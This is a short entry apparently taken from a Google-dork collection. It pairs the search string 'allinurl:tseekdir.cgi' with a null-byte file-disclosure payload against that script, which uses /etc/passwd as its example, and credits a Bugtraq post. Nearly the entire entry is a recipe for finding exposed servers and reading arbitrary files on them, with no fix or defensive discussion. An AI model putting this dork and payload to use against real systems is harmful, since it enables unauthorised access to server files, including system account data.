Google Search: allinurl:tseekdir.cgi
Ronald MacDonald rates this entry 8 out of 10.
Submitted: 2006-05-22 00:00:00
Added by: Ronald MacDonald
tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html